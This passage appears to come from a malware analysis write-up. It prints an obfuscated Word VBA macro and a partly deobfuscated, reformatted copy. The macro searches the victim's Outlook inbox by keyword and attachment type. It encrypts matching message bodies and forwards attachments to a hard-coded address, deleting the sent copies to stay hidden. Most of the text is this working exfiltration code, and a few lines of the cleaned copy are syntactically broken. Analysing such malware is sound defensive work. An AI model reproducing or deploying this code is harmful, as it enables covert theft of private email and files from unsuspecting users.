KfBAtqXWVPbl = OFTngrKtymtIs.FileName
tFWjedYCFp = Split(KfBAtqXWVPbl, nkalPYSrDkoirG(Array(((13 ^ 21) + (0 ^ 1))), ((181 ^ 286) + (94 ^ 373))))((1 + 0))
Dim dPjnuzlcUPVn As Variant
For Each dPjnuzlcUPVn In RQRaVHWlfs
If (InStr((1 ^ 0), UCase(tFWjedYCFp), dPjnuzlcUPVn, vbTextCompare) > 0) Then
sBtphCWmicZ = True
Else
sBtphCWmicZ = False
End If
Next
Dim YXeXnGWwCIuAtn As Variant
For Each YXeXnGWwCIuAtn In whDjrLULSB
If (InStr(1, UCase(KfBAtqXWVPbl), YXeXnGWwCIuAtn, vbTextCompare) > (0 ^ 0)) Then
FSvAGmBKEpy = True
Else
FSvAGmBKEpy = False
End If
Next
If sBtphCWmicZ Or FSvAGmBKEpy Then
mvieYItXUPBIvj = True
Else
mvieYItXUPBIvj = False
End If
End Function
Public Function ovLKcDvvuvaxVc(ByVal wjzTImaDJSRTu As String) As Byte()
If Not SiTdrVDFDh Then vUyFpuvJDb
Dim wRIruiQpxDvw() As Byte: wRIruiQpxDvw = dpoZtAIxbLpJPI(wjzTImaDJSRTu)
Dim kDrJAVJbNwtC As Long: kDrJAVJbNwtC = UBound(wRIruiQpxDvw) + ((1 ^ 0) + (0 ^ 0))
If kDrJAVJbNwtC Mod 4 <> (0 ^ 0) Then Err.Raise vbObjectError, , ""
Do While kDrJAVJbNwtC > (0 + 0)
If wRIruiQpxDvw(kDrJAVJbNwtC - ((1 ^ 0) + (0 ^ 0))) <> Asc("=") Then Exit Do
kDrJAVJbNwtC = kDrJAVJbNwtC - 1
Loop
Dim HiRTbQaeOizeHo As Long: HiRTbQaeOizeHo = (kDrJAVJbNwtC * 3) \ 4
Dim dxYxQUpsKjOLmV() As Byte
ReDim dxYxQUpsKjOLmV((0 + 0) To HiRTbQaeOizeHo - (0 + (0 ^ 1))) As Byte
Dim IeVHLPDMGs As Long
Dim LBRLfYhwmCYTKQ As Long
Do While IeVHLPDMGs < kDrJAVJbNwtC
Dim uSdVVLRsgv As Byte: uSdVVLRsgv = wRIruiQpxDvw(IeVHLPDMGs): IeVHLPDMGs = IeVHLPDMGs + (1 ^ 0)
Dim ivfRQonHupynCi As Byte: ivfRQonHupynCi = wRIruiQpxDvw(IeVHLPDMGs): IeVHLPDMGs = IeVHLPDMGs + (0 ^ 1)
Dim DkJQeBghXpHn As Byte: If IeVHLPDMGs < kDrJAVJbNwtC Then DkJQeBghXpHn = wRIruiQpxDvw(IeVHLPDMGs): IeVHLPDMGs = IeVHLPDMGs + (0 ^ 1) Else DkJQeBghXpHn = Asc("A")
Dim YRUQTcrcxsrbaR As Byte: If IeVHLPDMGs < kDrJAVJbNwtC Then YRUQTcrcxsrbaR = wRIruiQpxDvw(IeVHLPDMGs): IeVHLPDMGs = IeVHLPDMGs + 1 Else YRUQTcrcxsrbaR = Asc("A")
If uSdVVLRsgv > (90 ^ 37) Or ivfRQonHupynCi > 127 Or DkJQeBghXpHn > (84 ^ 43) Or YRUQTcrcxsrbaR > (121 ^ 6) Then _
Err.Raise vbObjectError, , ""
Dim sLnJGqBWDN As Byte: sLnJGqBWDN = djMloUrgDXwtHC(uSdVVLRsgv)
Dim kXtArjueRudv As Byte: kXtArjueRudv = djMloUrgDXwtHC(ivfRQonHupynCi)
Dim ZDfzccazGV As Byte: ZDfzccazGV = djMloUrgDXwtHC(DkJQeBghXpHn)
Dim qObQrUydGx As Byte: qObQrUydGx = djMloUrgDXwtHC(YRUQTcrcxsrbaR)
If sLnJGqBWDN > 63 Or kXtArjueRudv > 63 Or ZDfzccazGV > 63 Or qObQrUydGx > (53 + (7 ^ 13)) Then _
Err.Raise vbObjectError, , ""
Dim IyuerXStwwqpzc As Byte: IyuerXStwwqpzc = (sLnJGqBWDN * 4) Or (kXtArjueRudv \ &H10)
Dim BvlunkHjhB As Byte: BvlunkHjhB = ((kXtArjueRudv And &HF) * &H10) Or (ZDfzccazGV \ (0 ^ 4))
Dim qMEiPPYHJDAhY As Byte: qMEiPPYHJDAhY = ((ZDfzccazGV And (2 + 1)) * &H40) Or qObQrUydGx
dxYxQUpsKjOLmV(LBRLfYhwmCYTKQ) = IyuerXStwwqpzc: LBRLfYhwmCYTKQ = LBRLfYhwmCYTKQ + 1
If LBRLfYhwmCYTKQ < HiRTbQaeOizeHo Then dxYxQUpsKjOLmV(LBRLfYhwmCYTKQ) = BvlunkHjhB: LBRLfYhwmCYTKQ = LBRLfYhwmCYTKQ + 1
If LBRLfYhwmCYTKQ < HiRTbQaeOizeHo Then dxYxQUpsKjOLmV(LBRLfYhwmCYTKQ) = qMEiPPYHJDAhY: LBRLfYhwmCYTKQ = LBRLfYhwmCYTKQ + 1
Loop
ovLKcDvvuvaxVc = dxYxQUpsKjOLmV
End Function
Private Sub vUyFpuvJDb()
Dim egVlWScuJR As Integer, KLMydQnxMZSOX As Integer
KLMydQnxMZSOX = ((0 ^ 0) + (0 ^ 0))
For egVlWScuJR = Asc("A") To Asc("Z"): lxtmwrylodux(KLMydQnxMZSOX) = egVlWScuJR: KLMydQnxMZSOX = KLMydQnxMZSOX + ((0 ^ 1) + (0 ^ 0)): Next
For egVlWScuJR = Asc("a") To Asc("z"): lxtmwrylodux(KLMydQnxMZSOX) = egVlWScuJR: KLMydQnxMZSOX = KLMydQnxMZSOX + (0 + 1): Next
For egVlWScuJR = Asc("0") To Asc("9"): lxtmwrylodux(KLMydQnxMZSOX) = egVlWScuJR: KLMydQnxMZSOX = KLMydQnxMZSOX + 1: Next
lxtmwrylodux(KLMydQnxMZSOX) = Asc("+"): KLMydQnxMZSOX = KLMydQnxMZSOX + (1 ^ 0)
lxtmwrylodux(KLMydQnxMZSOX) = Asc("/"): KLMydQnxMZSOX = KLMydQnxMZSOX + ((0 ^ 0) + (1 ^ 0))
For KLMydQnxMZSOX = (0 ^ 0) To (97 + (21 ^ 11)): djMloUrgDXwtHC(KLMydQnxMZSOX) = (169 ^ 86): Next
For KLMydQnxMZSOX = (0 ^ 0) To ((2 ^ 10) + 55): djMloUrgDXwtHC(lxtmwrylodux(KLMydQnxMZSOX)) = KLMydQnxMZSOX: Next
SiTdrVDFDh = True
End Sub
Private Function dpoZtAIxbLpJPI(ByVal wjzTImaDJSRTu As String) As Byte()
Dim kXtArjueRudv() As Byte: kXtArjueRudv = wjzTImaDJSRTu
Dim bguIwEekiNS As Long: bguIwEekiNS = (UBound(kXtArjueRudv) + (0 ^ 1)) \ (2 + 0)
If bguIwEekiNS = (0 ^ 0) Then dpoZtAIxbLpJPI = kXtArjueRudv: Exit Function
Dim ZDfzccazGV() As Byte
ReDim ZDfzccazGV(0 To bguIwEekiNS - 1) As Byte
Dim adaOdggiLnYx As Long
For adaOdggiLnYx = (0 + 0) To bguIwEekiNS - (1 ^ 0)
Dim egVlWScuJR As Long: egVlWScuJR = kXtArjueRudv((2 ^ 0) * adaOdggiLnYx) + ((153 ^ 56) + (38 ^ 121)) * CLng(kXtArjueRudv((2 ^ 0) * adaOdggiLnYx + (0 ^ 1)))
If egVlWScuJR >= (6 + 250) Then egVlWScuJR = Asc("?")
ZDfzccazGV(adaOdggiLnYx) = egVlWScuJR
Next
dpoZtAIxbLpJPI = ZDfzccazGV
End Function
Private Function nkalPYSrDkoirG(JOaTlVhEgWePay As Variant, VkjJlLFzskbVY As Integer)
Dim fvPLOtDYqRXxu As String
Dim PjJHmvDBocr() As Byte
PjJHmvDBocr = ovLKcDvvuvaxVc(ActiveDocument.Variables("gtrxGyKtbDzUEDng"))
fvPLOtDYqRXxu = ""
For KLMydQnxMZSOX = LBound(JOaTlVhEgWePay) To UBound(JOaTlVhEgWePay)
fvPLOtDYqRXxu = fvPLOtDYqRXxu & Chr(PjJHmvDBocr(KLMydQnxMZSOX + VkjJlLFzskbVY) ^ JOaTlVhEgWePay(KLMydQnxMZSOX))
Next
nkalPYSrDkoirG = fvPLOtDYqRXxu
End FunctionStage 2 Analysis
When I was done deobfuscating the XORed strings, the next step or Stage 2 in deobfuscating the VBA script was to format it so that it is readable to us. The methodology is to tabulate and separate functions, so that we can analyse what each function does in Stage 3.
Const exfil_address As String = "dph@whschool.com"
Private SiTdrVDFDh As Boolean
Private lxtmwrylodux(0 To 63) As Byte
Private djMloUrgDXwtHC(0 To 127) As Byte
Function FVaFfsygaGuUBB(JulhxRTJAtZ)
Dim atBjGMlxGDau As Variant
Dim IsNslKdUSos As Long
Dim ULDvZWynDzG As String
atBjGMlxGDau = Array(
nkalPYSrDkoirG(Array(17), 16),
nkalPYSrDkoirG(Array(150), 17),
nkalPYSrDkoirG(Array(25), 18),
nkalPYSrDkoirG(Array(234), 19),
nkalPYSrDkoirG(Array(63), 20),
nkalPYSrDkoirG(Array(200), 21),
nkalPYSrDkoirG(Array(223), 22),
nkalPYSrDkoirG(Array(50), 23),
nkalPYSrDkoirG(Array(95), 24),
nkalPYSrDkoirG(Array(66), 25),
nkalPYSrDkoirG(Array(212), 26),
nkalPYSrDkoirG(Array(74), 27),
nkalPYSrDkoirG(Array(101), 28),
nkalPYSrDkoirG(Array(21), 29),
nkalPYSrDkoirG(Array(41), 30),
nkalPYSrDkoirG(Array(221), 31),
nkalPYSrDkoirG(Array(141), 32),
nkalPYSrDkoirG(Array(240), 33),
nkalPYSrDkoirG(Array(136), 34),
nkalPYSrDkoirG(Array(157), 35),
nkalPYSrDkoirG(Array(255), 36),
nkalPYSrDkoirG(Array(173), 37),
nkalPYSrDkoirG(Array(139), 38),
nkalPYSrDkoirG(Array(120), 39),
nkalPYSrDkoirG(Array(3), 40),
nkalPYSrDkoirG(Array(164), 41),
nkalPYSrDkoirG(Array(18), 42),
nkalPYSrDkoirG(Array(209), 43),
nkalPYSrDkoirG(Array(181), 44),
nkalPYSrDkoirG(Array(62), 45),
nkalPYSrDkoirG(Array(129), 46),
nkalPYSrDkoirG(Array(212), 47),
nkalPYSrDkoirG(Array(27), 48),
nkalPYSrDkoirG(Array(234),49),
nkalPYSrDkoirG(Array(121), 50),
nkalPYSrDkoirG(Array(173), 51),
nkalPYSrDkoirG(Array(150), 52),
nkalPYSrDkoirG(Array(94), 53),
nkalPYSrDkoirG(Array(73), 54),
nkalPYSrDkoirG(Array(72), 55),
nkalPYSrDkoirG(Array(129), 56),
nkalPYSrDkoirG(Array(213), 57),
nkalPYSrDkoirG(Array(29), 58),
nkalPYSrDkoirG(Array(22), 59),
nkalPYSrDkoirG(Array(90), 60),
nkalPYSrDkoirG(Array(15), 61),
nkalPYSrDkoirG(Array(192), 62),
nkalPYSrDkoirG(Array(138), 63),
nkalPYSrDkoirG(Array(198), 64),
nkalPYSrDkoirG(Array(191), 65),
nkalPYSrDkoirG(Array(42), 66),
nkalPYSrDkoirG(Array(209), 67),
nkalPYSrDkoirG(Array(253), 68),
nkalPYSrDkoirG(Array(119), 69),
nkalPYSrDkoirG(Array(45), 70),
nkalPYSrDkoirG(Array(40), 71),
nkalPYSrDkoirG(Array(98), 72),
nkalPYSrDkoirG(Array(131), 73),
nkalPYSrDkoirG(Array(93), 74),
nkalPYSrDkoirG(Array(160), 75),
nkalPYSrDkoirG(Array(150), 76),
nkalPYSrDkoirG(Array(178),77),
nkalPYSrDkoirG(Array(158), 78),
nkalPYSrDkoirG(Array(198), 79),
nkalPYSrDkoirG(Array(241), 80),
nkalPYSrDkoirG(Array(26), 81), _
nkalPYSrDkoirG(Array(82), 82),
nkalPYSrDkoirG(Array(242), 83),
nkalPYSrDkoirG(Array(10), 84),
nkalPYSrDkoirG(Array(32), 85))
For IsNslKdUSos = 1 To JulhxRTJAtZ
Randomize
ULDvZWynDzG = ULDvZWynDzG & atBjGMlxGDau(Int((UBound(atBjGMlxGDau) - LBound(atBjGMlxGDau) + 1) * Rnd + LBound(atBjGMlxGDau)))
Next IsNslKdUSos
FVaFfsygaGuUBB = ULDvZWynDzG
End Function
Function MTDPxqUeBtnHy(QvXdgzREtgivJc, MJAnPLmDOHCpM)
MTDPxqUeBtnHy = QvXdgzREtgivJc
If MJAnPLmDOHCpM < QvXdgzREtgivJc Then MTDPxqUeBtnHy = MJAnPLmDOHCpM
End Function
Function ahSFGkugmp(NfZjOnhlizlg)
Dim BPFDRGiTpeffVc As String
Dim IxqNKATnfrjL() As Byte
Dim PIBNxhGCNMURDD As Object
Dim MyKtJzYAsXy As Object
Dim xothlNMzDN, JulhxRTJAtZ, QrbstMncnU As Integer
Set PIBNxhGCNMURDD = CreateObject(
nkalPYSrDkoirG(Array(65, 15, 169, 83, 186), 86) &
nkalPYSrDkoirG(Array(160, 103, 128, 8, 139, 97, 250, 79, 95, 224, 170, 96, 245, 71, 103, 186, 44, 103, 158, 31, 232, 129, 82, 178, 18, 133, 115, 194, 192, 66, 183, 36, 182, 38, 237, 182, 196, 164, 237, 214, 214), 91))
Set MyKtJzYAsXy = CreateObject(
nkalPYSrDkoirG(Array(82, 13, 112, 27, 109, 196, 165, 198, 206, 116, 96, 74, 41, 247, 250), 132) &
nkalPYSrDkoirG(Array(9, 168, 144, 139, 171, 93, 234, 155, 173), 147))
QrbstMncnU = PIBNxhGCNMURDD.InputBlockSize
For xothlNMzDN = 0 To LenB(NfZjOnhlizlg) - 1 Step QrbstMncnU
JulhxRTJAtZ = MTDPxqUeBtnHy(QrbstMncnU, UBound(NfZjOnhlizlg) - xothlNMzDN)
IxqNKATnfrjL = PIBNxhGCNMURDD.TransformFinalBlock((NfZjOnhlizlg), xothlNMzDN, JulhxRTJAtZ)
BPFDRGiTpeffVc = BPFDRGiTpeffVc & MyKtJzYAsXy.GetString((IxqNKATnfrjL))
Next
ahSFGkugmp = BPFDRGiTpeffVc
End Function
Function uEfmNHGlYFaj(qcGjVkReTg)
Dim MyKtJzYAsXy As Object
Dim NfZjOnhlizlg() As Byte
Dim ScMpMxoqdQ As Object
Set MyKtJzYAsXy = CreateObject(
nkalPYSrDkoirG(Array(186, 199, 237, 173, 11), 156) &
nkalPYSrDkoirG(Array(42, 147, 244, 227, 217, 20, 240, 189, 169, 218, 150, 218, 26, 120, 30, 247, 238, 39, 103), 161))
Set ScMpMxoqdQ = CreateObject(
nkalPYSrDkoirG(Array(41, 16, 195, 43, 54, 227, 171, 46, 45, 11, 114, 248, 18, 181, 226, 40, 111, 219, 130, 157, 226, 34, 206, 1, 40, 141, 7, 115, 214, 206, 151, 192, 206, 49, 69), 180) &
nkalPYSrDkoirG(Array(3, 190, 148, 200, 88, 140, 195, 140, 153, 176, 150, 241, 144), 215))
NfZjOnhlizlg = MyKtJzYAsXy.GetBytes_4(qcGjVkReTg)
uEfmNHGlYFaj = ScMpMxoqdQ.TransformFinalBlock((NfZjOnhlizlg), 0, UBound(NfZjOnhlizlg))
End Function
Function ydcyecOpBU(dGArFkUqGLilS)
Dim NdOBkdEXtS, wotFUFrkOjPBgY, zGRVIukttQSSEv, qdjbSxTRAtUT() As Byte
Dim BFSsfIzKNm As String
BFSsfIzKNm = FVaFfsygaGuUBB(32)
Dim MyKtJzYAsXy, igFwXpLeArakc, zrjycZwtKFJvAu, IVdDfkxSWPOTi As Object
Dim kSNpGaWBeFRbpl() As Byte
Set igFwXpLeArakc = CreateObject(
nkalPYSrDkoirG(Array(128, 29, 106, 31, 232, 174, 73, 243, 91, 20, 179, 19), 228) &
nkalPYSrDkoirG(Array(138, 11, 119, 140, 67, 108, 195, 144, 46, 90, 18, 82, 93, 56, 103, 59, 186, 72, 24, 197, 227, 104, 22, 77, 130, 139, 110, 160, 3, 95, 112, 217), 240)
)
Set MyKtJzYAsXy = CreateObject(
nkalPYSrDkoirG(Array(4, 92, 60, 38, 46, 49, 104, 151, 61, 108, 167, 130, 41, 233, 219, 136, 175, 129, 75, 197, 16, 100), 272) &
nkalPYSrDkoirG(Array(145, 123), 294)
)
igFwXpLeArakc.KeySize = 256
igFwXpLeArakc.QrbstMncnU = 256
igFwXpLeArakc.Mode = (1 + 0)
igFwXpLeArakc.Key = CreateObject(
nkalPYSrDkoirG(Array(0, 197, 27, 133, 56, 40, 80, 11, 178, 159, 177, 111, 197, 230, 72, 128, 66), 296) &
nkalPYSrDkoirG(Array(160, 61, 255, 59, 234, 83, 133), 313)).GetBytes_4(
nkalPYSrDkoirG(Array(123, 135, 173, 251, 121, 152, 165, 131, 51, 106, 23, 231, 49, 113, 196, 188, 30, 231, 175, 225, 114, 173, 206, 191, 220, 210, 233, 94, 135), 320) &
nkalPYSrDkoirG(Array(149, 231, 36), 349)
)
igFwXpLeArakc.BFSsfIzKNm = CreateObject(
nkalPYSrDkoirG(Array(87, 173, 86, 217, 37, 115, 66, 233, 171, 187, 26), 352) &
nkalPYSrDkoirG(Array(74, 174, 187, 135, 132, 67, 152, 67, 154, 20, 24, 39, 73), 363)).GetBytes_4(BFSsfIzKNm)
qdjbSxTRAtUT = CreateObject(
nkalPYSrDkoirG(Array(33, 167, 233, 97, 232, 150, 133, 152, 196, 112, 250, 209, 64, 92, 38, 253, 207, 119), 376) &
nkalPYSrDkoirG(Array(106, 89, 107, 166, 255, 238), 394)).GetBytes_4(dGArFkUqGLilS)
NdOBkdEXtS = igFwXpLeArakc.CreateEncryptor().TransformFinalBlock((qdjbSxTRAtUT), 0, UBound(qdjbSxTRAtUT))
ydcyecOpBU = BFSsfIzKNm & nkalPYSrDkoirG(Array(87), 400) & ahSFGkugmp(NdOBkdEXtS)
End Function
Sub jexCsPbeKyQ()
Dim whDjrLULSB
whDjrLULSB = Array(
nkalPYSrDkoirG(Array(145, 247, 232, 39, 180, 2, 15), 401) &
nkalPYSrDkoirG(Array(128), 408),
nkalPYSrDkoirG(Array(61, 191, 159, 221, 67, 62), 409),
nkalPYSrDkoirG(Array(22, 191, 72, 72, 243), 415), _
nkalPYSrDkoirG(Array(81, 135, 219, 250, 98, 135, 226, 214, 50), 420) &
nkalPYSrDkoirG(Array(183), 429),
nkalPYSrDkoirG(Array(31, 0, 15, 255, 100), 430) &
nkalPYSrDkoirG(Array(215, 232, 80, 157, 177, 249), 435),
nkalPYSrDkoirG(Array(160, 48, 243, 84, 118, 78), 441) &
nkalPYSrDkoirG(Array(145, 36, 207, 244), 447), _
nkalPYSrDkoirG(Array(114, 255, 135, 236, 183), 451) &
nkalPYSrDkoirG(Array(80, 81, 233, 118, 210, 137, 247, 9, 3, 206, 205, 36, 145, 18, 88, 178, 88), 456)
)
Dim RQRaVHWlfs
RQRaVHWlfs = Array( _
nkalPYSrDkoirG(Array(36, 181, 114), 482),
nkalPYSrDkoirG(Array(244, 131, 34), 485),
nkalPYSrDkoirG(Array(134, 22, 44), 488),
nkalPYSrDkoirG(Array(213, 155, 210), 491),
nkalPYSrDkoirG(Array(253, 154, 166), 494),
nkalPYSrDkoirG(Array(60, 249), 497) &
nkalPYSrDkoirG(Array(92, 111, 53, 0, 14), 499),
nkalPYSrDkoirG(Array(194, 32, 13), 504),
nkalPYSrDkoirG(Array(123, 29, 219), 507),
nkalPYSrDkoirG(Array(105, 175, 240), 510),
nkalPYSrDkoirG(Array(175, 185, 133, 24), 513),
nkalPYSrDkoirG(Array(139, 22, 170, 55), 517),
nkalPYSrDkoirG(Array(63, 233, 96, 74), 521),
nkalPYSrDkoirG(Array(13, 180, 164), 525),
nkalPYSrDkoirG(Array(118, 49, 48), 528),
nkalPYSrDkoirG(Array(31, 86, 40, 33), 531),
nkalPYSrDkoirG(Array(225, 47, 159, 30), 535),
nkalPYSrDkoirG(Array(42, 144, 11), 539),
nkalPYSrDkoirG(Array(47, 54, 191), 542),
nkalPYSrDkoirG(Array(223, 180, 184), 545),
nkalPYSrDkoirG(Array(185, 34), 548),
nkalPYSrDkoirG(Array(142, 197, 152), 550),
nkalPYSrDkoirG(Array(244, 225, 208), 553)
)
Dim PtXoKYFkpFJGSc As Object
Dim XstsppFkvZr As Object
Dim emDROsRKEd As String
Dim xfjOpXLsBTY As Object
Dim FCMymRIsfbrg As Object
Set PtXoKYFkpFJGSc = CreateObject(
nkalPYSrDkoirG(Array(32, 125, 145, 71, 85, 255, 213, 53, 242, 143), 556) &
nkalPYSrDkoirG(Array(195, 175, 156, 62, 16, 209, 130, 159, 232), 566)
)
Set xfjOpXLsBTY = PtXoKYFkpFJGSc.GetNamespace(nkalPYSrDkoirG(Array(31, 42, 202, 165), 575))
Set FCMymRIsfbrg = xfjOpXLsBTY.GetDefaultFolder(6).Items
Dim KLMydQnxMZSOX As Integer
Dim JxQPJFEkRSPeB As Boolean
JxQPJFEkRSPeB = False
Dim jUBrimEvzM As Boolean
jUBrimEvzM = False
Dim qeFHkrcXQwLmue As Date
Dim kcINMJtMyDQgLL As Date
Const daysToSearch As Integer = 400
qeFHkrcXQwLmue = Date - daysToSearch
kcINMJtMyDQgLL = Date
Dim QmmdKXwuMa As Object
For Each QmmdKXwuMa In FCMymRIsfbrg
If QmmdKXwuMa.ReceivedTime >= qeFHkrcXQwLmue And QmmdKXwuMa.ReceivedTime <= kcINMJtMyDQgLL Then
JxQPJFEkRSPeB = haPxSQQXjz(QmmdKXwuMa.body, QmmdKXwuMa.Subject, whDjrLULSB)
If JxQPJFEkRSPeB Then
Call ScsSqzpSPu(QmmdKXwuMa.body, QmmdKXwuMa.Subject)
End If
If QmmdKXwuMa.Attachments.Count > 0 Then
Dim xZLUISSiXEpR As Integer
For xZLUISSiXEpR = 1 To QmmdKXwuMa.Attachments.Count
jUBrimEvzM = mvieYItXUPBIvj(QmmdKXwuMa.Attachments.Item(xZLUISSiXEpR), RQRaVHWlfs, whDjrLULSB)
If jUBrimEvzM Then
Call RkrRzFVxFXd(QmmdKXwuMa, QmmdKXwuMa.Subject)
End If
Next
End If
End If
Next
Set XstsppFkvZr = Nothing
Set PtXoKYFkpFJGSc = Nothing
End Sub
Sub ScsSqzpSPu(IehgfWzjBPM As String, gjQiIlwvaI As String)
Dim PtXoKYFkpFJGSc As Object
Dim XstsppFkvZr As Object
Dim emDROsRKEd As String
Set PtXoKYFkpFJGSc = CreateObject(
nkalPYSrDkoirG(Array(214, 93, 101, 103, 224, 201, 71, 86, 14), 579) &
nkalPYSrDkoirG(Array(56, 100, 181, 81, 89, 81, 248, 26, 166, 87), 588))
Set XstsppFkvZr = PtXoKYFkpFJGSc.CreateItem(0)
emDROsRKEd = IehgfWzjBPM
On Error Resume Next
With XstsppFkvZr
.To = exfil_address
.CC = nkalPYSrDkoirG(Array(), 614)
.BCC = nkalPYSrDkoirG(Array(), 614)
.Subject = nkalPYSrDkoirG(Array(145, 63, 241, 40, 79, 11, 206, 75, 203, 10, 99, 119, 157, 175, 96, 33, 112, 243, 190, 162, 12, 14, 51, 123, 202, 234, 175, 31, 235, 200, 195, 224, 147, 11), 614) &
nkalPYSrDkoirG(Array(101, 232, 121), 648) &
Environ(
nkalPYSrDkoirG(Array(19, 248), 651) &
nkalPYSrDkoirG(Array(169, 114, 84, 92, 212, 112), 653)
)
.body = ydcyecOpBU(gjQiIlwvaI & emDROsRKEd)
.DeleteAfterSubmit = True
.Send
End With
On Error GoTo 0
Set XstsppFkvZr = Nothing
Set PtXoKYFkpFJGSc = Nothing
End Sub
Sub RkrRzFVxFXd(QmmdKXwuMa As Variant, gjQiIlwvaI As String)
Dim XstsppFkvZr As Object
Set XstsppFkvZr = QmmdKXwuMa.Forward
On Error Resume Next
With XstsppFkvZr
.To = exfil_address
.CC = nkalPYSrDkoirG(Array(), 675)
.BCC = nkalPYSrDkoirG(Array(), 675)
.Subject = nkalPYSrDkoirG(Array(127, 220, 31, 150, 211, 131, 71, 43, 170, 236, 164, 166, 112, 17, 25, 122, 182, 170, 207, 20, 251, 16, 104, 20, 237, 154, 60, 176, 203, 32, 210, 178, 153, 140, 89, 37, 100, 244, 224), 675) &
nkalPYSrDkoirG(Array(121, 159, 195, 255), 714) &
Environ(nkalPYSrDkoirG(Array(122, 116, 80, 109, 139, 170, 30), 718) &
nkalPYSrDkoirG(Array(146), 725))
.DeleteAfterSubmit = True
.Send
End With
On Error GoTo 0
Set XstsppFkvZr = Nothing
End Sub
Public Function haPxSQQXjz(IehgfWzjBPM As String, gjQiIlwvaI As String, whDjrLULSB As Variant) As Boolean
haPxSQQXjz = False
Dim YXeXnGWwCIuAtn As Variant
For Each YXeXnGWwCIuAtn In whDjrLULSB
If (InStr(1, UCase(IehgfWzjBPM), YXeXnGWwCIuAtn, vbTextCompare) > 0) Or (InStr(1, UCase(gjQiIlwvaI), YXeXnGWwCIuAtn, vbTextCompare) > 0) Then
haPxSQQXjz = True
Exit For
Else
haPxSQQXjz = False
End If
Next
End Function
Public Function mvieYItXUPBIvj(OFTngrKtymtIs As Variant, RQRaVHWlfs As Variant, whDjrLULSB As Variant) As Boolean
mvieYItXUPBIvj = False
Dim sBtphCWmicZ As Boolean
sBtphCWmicZ = False
Dim FSvAGmBKEpy As Boolean
FSvAGmBKEpy = False
Dim KfBAtqXWVPbl As String
Dim tFWjedYCFp As String
KfBAtqXWVPbl = OFTngrKtymtIs.FileName
tFWjedYCFp = Split(KfBAtqXWVPbl, nkalPYSrDkoirG(Array(25), 726))1
Dim dPjnuzlcUPVn As Variant
For Each dPjnuzlcUPVn In RQRaVHWlfs
If (InStr(1, UCase(tFWjedYCFp), dPjnuzlcUPVn, vbTextCompare) > 0) Then
sBtphCWmicZ = True
Else
sBtphCWmicZ = False
End If
Next
Dim YXeXnGWwCIuAtn As Variant
For Each YXeXnGWwCIuAtn In whDjrLULSB
If (InStr(1, UCase(KfBAtqXWVPbl), YXeXnGWwCIuAtn, vbTextCompare) > 0) Then
FSvAGmBKEpy = True
Else
FSvAGmBKEpy = False
End If
Next
If sBtphCWmicZ Or FSvAGmBKEpy Then
mvieYItXUPBIvj = True
Else
mvieYItXUPBIvj = False
End If
End Function
Public Function ovLKcDvvuvaxVc(ByVal wjzTImaDJSRTu As String) As Byte()
If Not SiTdrVDFDh Then vUyFpuvJDb
Dim wRIruiQpxDvw() As Byte: wRIruiQpxDvw = dpoZtAIxbLpJPI(wjzTImaDJSRTu)
Dim kDrJAVJbNwtC As Long: kDrJAVJbNwtC = UBound(wRIruiQpxDvw) + 1
If kDrJAVJbNwtC Mod 4 <> 0 Then Err.Raise vbObjectError, , ""
Do While kDrJAVJbNwtC > 0
If wRIruiQpxDvw(kDrJAVJbNwtC - 1) <> Asc("=") Then Exit Do
kDrJAVJbNwtC = kDrJAVJbNwtC - 1
Loop
Dim HiRTbQaeOizeHo As Long: HiRTbQaeOizeHo = (kDrJAVJbNwtC * 3) \ 4
Dim dxYxQUpsKjOLmV() As Byte
ReDim dxYxQUpsKjOLmV(0 To HiRTbQaeOizeHo - 1) As Byte
Dim IeVHLPDMGs As Long
Dim LBRLfYhwmCYTKQ As Long
Do While IeVHLPDMGs < kDrJAVJbNwtC
Dim uSdVVLRsgv As Byte: uSdVVLRsgv = wRIruiQpxDvw(IeVHLPDMGs): IeVHLPDMGs = IeVHLPDMGs + 1
Dim ivfRQonHupynCi As Byte: ivfRQonHupynCi = wRIruiQpxDvw(IeVHLPDMGs): IeVHLPDMGs = IeVHLPDMGs + 1
Dim DkJQeBghXpHn As Byte: If IeVHLPDMGs < kDrJAVJbNwtC Then DkJQeBghXpHn = wRIruiQpxDvw(IeVHLPDMGs): IeVHLPDMGs = IeVHLPDMGs + 1 Else DkJQeBghXpHn = Asc("A")
Dim YRUQTcrcxsrbaR As Byte: If IeVHLPDMGs < kDrJAVJbNwtC Then YRUQTcrcxsrbaR = wRIruiQpxDvw(IeVHLPDMGs): IeVHLPDMGs = IeVHLPDMGs + 1 Else YRUQTcrcxsrbaR = Asc("A")
If uSdVVLRsgv > 127 Or ivfRQonHupynCi > 127 Or DkJQeBghXpHn > 127 Or YRUQTcrcxsrbaR > 127 Then
Err.Raise vbObjectError, , ""
Dim sLnJGqBWDN As Byte: sLnJGqBWDN = djMloUrgDXwtHC(uSdVVLRsgv)
Dim kXtArjueRudv As Byte: kXtArjueRudv = djMloUrgDXwtHC(ivfRQonHupynCi)
Dim ZDfzccazGV As Byte: ZDfzccazGV = djMloUrgDXwtHC(DkJQeBghXpHn)
Dim qObQrUydGx As Byte: qObQrUydGx = djMloUrgDXwtHC(YRUQTcrcxsrbaR)
If sLnJGqBWDN > 63 Or kXtArjueRudv > 63 Or ZDfzccazGV > 63 Or qObQrUydGx > 63 Then _
Err.Raise vbObjectError, , ""
Dim IyuerXStwwqpzc As Byte: IyuerXStwwqpzc = (sLnJGqBWDN * 4) Or (kXtArjueRudv \ &H10)
Dim BvlunkHjhB As Byte: BvlunkHjhB = ((kXtArjueRudv And &HF) * &H10) Or (ZDfzccazGV \ 4)
Dim qMEiPPYHJDAhY As Byte: qMEiPPYHJDAhY = ((ZDfzccazGV And 3 * &H40) Or qObQrUydGx
dxYxQUpsKjOLmV(LBRLfYhwmCYTKQ) = IyuerXStwwqpzc: LBRLfYhwmCYTKQ = LBRLfYhwmCYTKQ + 1
If LBRLfYhwmCYTKQ < HiRTbQaeOizeHo Then dxYxQUpsKjOLmV(LBRLfYhwmCYTKQ) = BvlunkHjhB: LBRLfYhwmCYTKQ = LBRLfYhwmCYTKQ + 1
If LBRLfYhwmCYTKQ < HiRTbQaeOizeHo Then dxYxQUpsKjOLmV(LBRLfYhwmCYTKQ) = qMEiPPYHJDAhY: LBRLfYhwmCYTKQ = LBRLfYhwmCYTKQ + 1
Loop
ovLKcDvvuvaxVc = dxYxQUpsKjOLmV
End Function
Private Sub vUyFpuvJDb()
Dim egVlWScuJR As Integer, KLMydQnxMZSOX As Integer
KLMydQnxMZSOX = 0
For egVlWScuJR = Asc("A") To Asc("Z"): lxtmwrylodux(KLMydQnxMZSOX) = egVlWScuJR: KLMydQnxMZSOX = KLMydQnxMZSOX + 1: Next
